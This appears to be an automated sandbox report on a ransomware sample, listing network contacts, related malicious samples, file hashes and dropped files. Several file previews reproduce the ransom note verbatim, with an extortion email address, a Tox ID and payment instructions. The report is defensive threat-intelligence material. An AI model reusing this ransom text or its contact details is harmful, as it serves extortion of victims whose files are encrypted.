              http://utox.orgwin_gui.exe.exe, 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp, README.TXT48.0.dr, README.TXT271.0.dr, README.TXT262.0.dr, README.TXT404.0.dr, README.TXT582.0.dr, README.TXT629.0.dr, README.TXT541.0.dr, README.TXT574.0.dr, README.TXT555.0.dr, README.TXT374.0.dr, README.TXT586.0.dr, README.TXT243.0.dr, README.TXT382.0.dr, README.TXT200.0.dr, README.TXT669.0.dr, README.TXT391.0.dr, README.TXT418.0.dr, README.TXT350.0.dr, README.TXT127.0.dr, README.TXT333.0.drtrue
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              172.67.167.249
              		iplogger.coUnited States
              		13335CLOUDFLARENETUSfalse

              Private

              IP
              192.168.2.148
              192.168.2.149
              192.168.2.146
              192.168.2.147
              192.168.2.140
              192.168.2.141
              192.168.2.144
              192.168.2.145
              192.168.2.142
              192.168.2.143
              192.168.2.159
              192.168.2.157
              192.168.2.158
              192.168.2.151
              192.168.2.152
              192.168.2.150
              192.168.2.155
              192.168.2.156
              192.168.2.153
              192.168.2.154
              192.168.2.126
              192.168.2.247
              192.168.2.127
              192.168.2.248
              192.168.2.124
              192.168.2.245
              192.168.2.125
              192.168.2.246
              192.168.2.128
              192.168.2.249
              192.168.2.129
              192.168.2.240
              192.168.2.122
              192.168.2.243
              192.168.2.123
              192.168.2.244
              192.168.2.120
              192.168.2.241
              192.168.2.121
              192.168.2.242
              192.168.2.97
              192.168.2.137
              192.168.2.96
              192.168.2.138
              192.168.2.99
              192.168.2.135
              192.168.2.98
              192.168.2.136
              192.168.2.139
              192.168.2.250
              192.168.2.130
              192.168.2.251
              192.168.2.91
              192.168.2.90
              192.168.2.93
              192.168.2.133
              192.168.2.254
              192.168.2.92
              192.168.2.134
              192.168.2.95
              192.168.2.131
              192.168.2.252
              192.168.2.94
              192.168.2.132
              192.168.2.253
              192.168.2.104
              192.168.2.225
              192.168.2.105
              192.168.2.226
              192.168.2.102
              192.168.2.223
              192.168.2.103
              192.168.2.224
              192.168.2.108
              192.168.2.229
              192.168.2.109
              192.168.2.106
              192.168.2.227
              192.168.2.107
              192.168.2.228
              192.168.2.100
              192.168.2.221
              192.168.2.101
              192.168.2.222
              192.168.2.220
              192.168.2.115
              192.168.2.236
              192.168.2.116
              192.168.2.237
              192.168.2.113
              192.168.2.234
              192.168.2.114
              192.168.2.235
              192.168.2.119
              192.168.2.117
              192.168.2.238
              192.168.2.118
              192.168.2.239
              192.168.2.111

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1567651
              Start date and time:2024-12-03 17:49:56 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 35s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:win_gui.exe.exe
              (renamed file extension from infected to exe)
              Original Sample Name:win_gui.exe.infected
              Detection:MAL
              Classification:mal92.rans.spre.expl.evad.winEXE@1/1341@1/100
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 45
              • Number of non-executed functions: 184
              Cookbook Comments:
              • Override analysis time to 240s for sample files taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 217.20.59.35, 192.229.221.95
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadFile calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • Report size getting too big, too many NtWriteFile calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: win_gui.exe.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              11:51:55API Interceptor27x Sleep call for process: win_gui.exe.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              172.67.167.249file.exeGet hashmaliciousUnknownBrowse
                file.exeGet hashmaliciousLummaC StealerBrowse
                  sus.ps1Get hashmaliciousLummaCBrowse
                    ofsetvideofre.click.ps1Get hashmaliciousLummaCBrowse
                      4h1Zc12ZBe.exeGet hashmaliciousStealcBrowse
                        dlcdkJcbbV.exeGet hashmaliciousLummaC, RedLineBrowse
                          1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                            hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                              https://prezi.com/i/view/0dF0780HKO9RqC8umFaJGet hashmaliciousUnknownBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                iplogger.cofile.exeGet hashmaliciousUnknownBrowse
                                • 104.21.82.93
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 172.67.167.249
                                sus.ps1Get hashmaliciousLummaCBrowse
                                • 172.67.167.249
                                cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                • 104.21.76.57
                                cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                • 104.21.76.57
                                Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                                • 172.67.188.178
                                SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeGet hashmaliciousUnknownBrowse
                                • 104.21.76.57
                                file.exeGet hashmaliciousDarkTortilla, PureLog StealerBrowse
                                • 104.21.76.57
                                file.exeGet hashmaliciousDarkTortillaBrowse
                                • 104.21.76.57

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUSEmployee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                • 172.67.69.226
                                Employee_Important_Message.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 104.26.12.205
                                fes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                • 104.21.68.89
                                #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                • 172.67.198.207
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 104.21.16.9
                                Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                • 172.67.146.191
                                hnskldjf230.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                • 172.65.251.78
                                Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                • 172.67.146.191
                                3GloGaDtsG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 188.114.97.6
                                #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                • 104.21.13.77

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                28a2c9bd18a11de089ef85a160da29e4Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                Employee_Important_Message.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Get hashmaliciousUnknownBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                https://temp.farenheit.net/XWU9WdXVLQ1BPcVcwN28vNmJmQW9rZy9JbGl2YjNqdU82UXRXbjVuRDE4WHZ2S3E3MTh0U0RLVVRZRjcvL3o0M1ZEZW5HMGQ2cUJ6Q1dmd0d6MzNsK1IwNkc0c1FQTlFkODFpdjI1RE5wTTZrZjNNL2ZlNTNzb3kvbXlTenlUOC94REZCNXJyYzEwcDduQ0JYM1JvQnpTTEhpdHIzWXlMVFh3dnJkNWo5N3JWODhWWVd4MWx5T0pqcUNZQlY3ZHRFTktEUGRLRVR4czR1dTMvY282WURmWGE0TkhiSkd2dkNZOUlGWUE9PS0tVVdmbHMzdlpZZDU2aFdnMy0teWdvSnFiVklFSk13UEoyUlNUQzd4Zz09?cid=2308276595Get hashmaliciousKnowBe4Browse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                Document-v15-51-07.jsGet hashmaliciousUnknownBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 20.109.210.53
                                • 13.107.246.63
                                • 23.218.208.109
                                37f463bf4616ecd445d4a1937da06e19MLETdJL8JJ.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                tebWUNHW7S.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                RAZTZoDeHA.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                w0nz47MlOe.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                w0nz47MlOe.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249
                                gJUrBC17Wh.exeGet hashmaliciousGuLoaderBrowse
                                • 172.67.167.249

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\$WinREAgent\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Reputation:low
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\$WinREAgent\Scratch\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Reputation:low
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\EFI\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Reputation:low
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\Au3Check.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13693
                                Entropy (8bit):7.9877505603833185
                                Encrypted:false
                                SSDEEP:384:SercTtjIQcdsuMC6vXsxlKr1oTrvtw+VOc:zcBIfdsVCeXsxEgrVwY
                                MD5:F14CBEA46D6EE259A53CD01CD3594CF6
                                SHA1:DDA7F88631D014AAF056281B021FC5F581C21F69
                                SHA-256:FD34EADC55EE6BF17F643630EDDCD664DF6BB4976C10846B53CDD2FD0E51E4F7
                                SHA-512:9171955AF20678F411FA77E2693C0A6ED8989A39B9368BC7AFB6A6A55562951E716D2EEB95F5FB74BAE7B1601EFAD615BFA43EEC889331455F1D8952CB95CE07
                                Malicious:false
                                Reputation:low
                                Preview:.e.}J.`Z."H.B..?.S`..7qSl..........m..*/.Q../OB.7.a.D=*..+B....P.Q.$.h..`.O...Cx.....).^t.T.....;2..f....f.....cf....[k.?..c.e>...Bl.Dw.z...e....{...._6.g.J.N.....+...i.9......T...g...e..........[.j.....26..U..*.Y.%Q0.._4.f`.B.....7.)......v... .&W..?y<...ta/..w'o...4.|...W..E.V./`4.3...k..<......D7.I......;..K...7;o.pqz....4...F.....v....p;Ym..`3.[...4.o.3...).|..4.'.o.D..i....ymI.p.Wa.y...v....6..4.F.s"y.^..N..)*v.'.Q....v.oz.3.6...'..)......K....R..:0..0}@*.}*....)....e._+...a....:..7./...Z......V.{.>?Ht.V.......<......5.Y(...._.7#.lO..p..&q#d.ah.n....Z..R.|.3V.n...C..K......W..5V...eitp..."k5.z.J....g../.&../..9.......vu..]..5^ 1..Dr..nf......b...5{....x...l'......M.C~2..sD..V.q .w..e......XDT....J.D...-.f]s..b..@e..a.,.j.m.^F*D..U...]......|...z...|.G-40R.....36..]5..2..f..T%.v....0.....C..m.0....m$...v.v'j...UB^.e..u.X..l\...2.W...+..m..n+B....t.."..1..i...K:zA..L....!...'$........e.J/..Yr.........;bI..P..D..:.pAH$....5...\..'..0...RN

                                C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):234696
                                Entropy (8bit):7.999142776172254
                                Encrypted:true
                                SSDEEP:6144:3Au9tuRx/tsmgk2HUEpjUtwha5aJYYqEbCnnAa4eZK:p9twa3Na0a9rEFJ
                                MD5:3D54BAAFFE03A2520638138A31FD15D5
                                SHA1:7755AFD7534FCF3BB4D6E24FD3DD918EB74612FB
                                SHA-256:4D5C45754D2D4597224D4B9BE101FC79391613106B74573A51D1E9DFD413CB0D
                                SHA-512:4C5603D93FDF32F3CD67769E9BD7A131552E99078A9BB48FEFBE333BD1D70E8C3F22A4D1DC0EB827A1B261C85575038DC43B8F25C44D08356013B260B5E2FC0E
                                Malicious:true
                                Reputation:low
                                Preview:.q....(z...yH9K.^...=....3..2.Gd.........p..jjG.._.K)".D.!.[J...K..!.G!...-.a..s....qH.....2_......,{......%=.8%..{i1.E..M...J..-..AY_..)..P[A........w'k9[$.|....@f.N3=4B'..Z-.&.G.`.`p.1.l.....[0#l.mz.=m..5..y.JZ..j@X..Igt8."zF.>.............!..C.....D{....B6;..U..C;.#1-CNz<.:....{.......ai....yV.a..O..h.'.....3.....!t.2..2.....N.~.[...6.......n:F.Fy....a...Y0VN...5.@...|6..e.....c..,Y.S.S..%@.........a.>sq$...ZL...F..E7).;../N.V.....nI.k-....L.:.>.....'.f.a.!.....Pm..Nf.Oo....O...t...@}..:.._.C._.u....IR..C.RG....."...J.SE.>n.Mp.kz...D..Zw...... .4f.0!.o...6...zP1._....e.Ly1.i3.."-.FFw......~..8..[.1...5..._....X..G.dR.\iOp...fJ...}.g..0....+p.....sn...t...w..,..y......$........W......}q~....@...(.z..#.x.....}...)Mo.U ...8.h.4T1....`..0.K.BV(m$Y..1....7W.........d8...u..3[[..Q......>....S]d.#..x....Yj..C.DnE.. H..=..P..V..w0o.9..6.CIzK.o....I...NJI7......]e8..~....K.F....-...l.@._4.B.M...o.........M\..pkrUo....{?r..-S.../P......t..1d...

                                C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176840
                                Entropy (8bit):7.998808341285109
                                Encrypted:true
                                SSDEEP:3072:zvDTnF6mZ+UDhcs7V/8iuDGPHbfCp4y3NdupnCl9Zy7sVUw4dkf94Gld1b:jnF3Hcs7sDYHzCp4ud9MsVUwik3ld1b
                                MD5:E44D43CEB63E1F03FE7F18FBBDE1FDD2
                                SHA1:6921D4041F44C809055E4CCB8CC0C076DFEF0BDB
                                SHA-256:FA3549D98606DFB67A754CD01A1774CA440F3505FED75EB32EDA6DC7FA48402E
                                SHA-512:5A280050DAFF007AE7E97BB1D2A1AE055E7843E6679B8E20EDE926F28EF0ED99C5D03AC2365AA61CA6C075BECF8D56568036C3FD03464AA1251811B6D85EBCAB
                                Malicious:true
                                Reputation:low
                                Preview:Vi..0...}.....(..~...).-....ro.......hx.....U.X...L..?;zN.#.X...b..`...B![.....&..C.....ET.xKI..Xt....s.v_."x;W.'....2.[s....(..kSSmI.Y..gQs...^...a.y..?.....f...u]..%.7h..Gt<.e>#..ey|...aQ.7?....q.N>.......WV.8..*....#...h3@C.(=..3..z.H].q.7.u..y.....o..f...y~.x..._..@..R,,.....u...M........R.G.V.=~.;?...w......{h...S.}~.Gg.$.(..d..o6.......w.z.iu...N.b.....t.;([....$........S. '.!...(CCbZ..C-.>.....+.V8.....$..].`DA...&.M..}.@..Wv..W@]..(.yAcPDPi...?-....=...1.. .Ti.....Ai.e.E4...z..PY?.m.o..v..A.+..%5..x..%..s .....O.@..`...s\/..:)8;A........=.W.k.e]...B..i...$..o..`.......ce@. :f..8.Pe....r..0.k.....)..ckA}.)?..~...cT......a...F E\;..!......1`...%..<E.n.......^.>.,aS.%.....O.....Fr..-.k.y.....f.7.....;.......+WK...e.lJ.-.. ..L.."`.`n.^[....m.......Z.*..v.^zwum.'M..#......(]..p...g.x...".g.,.....L..}xX........O.$~pl\,..zV.1{.F..W..UAZG.U..Db..=.u.....L..........^*>..8.~.....^.w..]$......y.}|j...4..B6V....V.&..l..6:...h...C..+Z.g.u....L...

                                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):196296
                                Entropy (8bit):7.999106659430505
                                Encrypted:true
                                SSDEEP:3072:NtVyf4xheJMsZ2XXuOJvpP3niB2yqCXSudih2yLD2GC4ARPPLr6FOCWElPq:NtIfM0usZSpvnW2yX7pyLiGC4W3H
                                MD5:734F3D3B91AE128D3AFCB81137439574
                                SHA1:BC80B7F1BA234A088ADACAD954A37BA3CE6FA116
                                SHA-256:AED4167B3B0E8FEDE552486F5B5F0E7453E602B652F5E24DF7408DA31BB7E8E5
                                SHA-512:F64DC6C6BFA9694EB42BEE6BB2F69B03C66CB1A10D5043A556AAE952C7D8E31146C3B2185552CA747583C36D3B751EDB1B843A078F6C641DAC84165846FCFAF3
                                Malicious:true
                                Reputation:low
                                Preview:....@~.G.....e........R..T.>......@f.....D ..f.;T..,......._N...^6..d....M...".x..V.+#TF. .0.n". ......i.......{..-e..i=.%`..%bY=.d%.+..XM..tO_q|..s.....9(.0.y.=)..K..V.l..V.c......m'.u?...#..Tx..kpR.....i.ov.r).c.o...a...4..p"...XS.....5.ae?|..#..;d...gS..|..R.q.|>.|t}.X..~...........B... ...Z.......!........V.P.7.2E..>..D.!.....O..&..8_V.......d.....}.}.{V....M....|..:...H3..........3...7...*....M...........p.F[...u..%L.8.Q....+f...{e..G..49.x.e.1..%....3C2.....$:..A~.w........Tj.7.w*3%....9.N+.@.(}.<.o6.$.b^..z:]bz..,..th....l....}.X. .......]...=i8....iBki...V....Z<7#.~.)3.......Sx53.,.Vo..&Io.3+C...X.`DW..=86+V\....\.s....o.*$.,}.6...k`U....g.D.w....\H.v.k......o.F..YS)...T.W...c.^~......9..3a./.[.H....X...B...@..;...p. 1\\u$J..)U..0]...-$.6.9.&.4.....O<j.b..@..Z..&M.m.hV...+E...j..D.q...&n.k~...V"....?^g..v.........q..,+`.f...4}...O.!V.n(.....L0RVM.'[sZ....V.w....d"l.......5.2.,e..i..Rf.&..F1...|.t*sT^I)+...;..nh..{.r.T.:...... N..`(.

                                C:\Program Files (x86)\AutoIt3\Aut2Exe\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Reputation:low
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\AutoIt3\AutoIt v3 Website.url

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):812
                                Entropy (8bit):7.710767094402821
                                Encrypted:false
                                SSDEEP:24:0ZsfyGpZ5z/wpDyYPGTNj0hOHAVMJg6WXs93K4:Q+9pT/WyYu+MAVMJg6T5
                                MD5:37E6C43602D8760CFC977C202FE58AFE
                                SHA1:04A7F866ED4520399C10B47B4AD3D6A68EDB3FDE
                                SHA-256:0FD783BE16F4983A34B94D41EA81B28110555C9EF79426D63D4E35A7C8EA5724
                                SHA-512:1186C82F75E22D8628761055D67E6F00709CA28D36EBFFC6075E0386D3654F2A4CACD3AAA591C73CFB16898C2C5EE96F48341504EFE7567197B8DBA6C9709B26
                                Malicious:false
                                Reputation:low
                                Preview:F|..v..&yG.Fx...%x.?.....~..D....A.f.V.BS..9....xp...."|....z..v6.IGJ#3.+....a....+k.\h.\...V./.m.ls.]8..NJ...c.Nf..q..i].......NK:....*.{y.3....G..h.|O! .jYD...}..C.......e.#ay..I?.js..N\...p.$2...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N....{.B..^.A..C..1 .E...t......YIm....................fk.W...f

                                C:\Program Files (x86)\AutoIt3\AutoIt.chm

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7186249
                                Entropy (8bit):7.995708840734016
                                Encrypted:true
                                SSDEEP:196608:b8aNYqqNaXN0wMHZVCqo/ugQ9dz5COj1fNAgBMkKi:bJpqlzH3M/uNDz5bWgBAi
                                MD5:8EBCA2DF5CB8AFF13B44E6544BD795D0
                                SHA1:007278F60651216E5CD151D621F897A965199C2D
                                SHA-256:44BC34E80A6BD4EB53FB1BC86456096BCDE00D28E202A8DE27D877036409BBB0
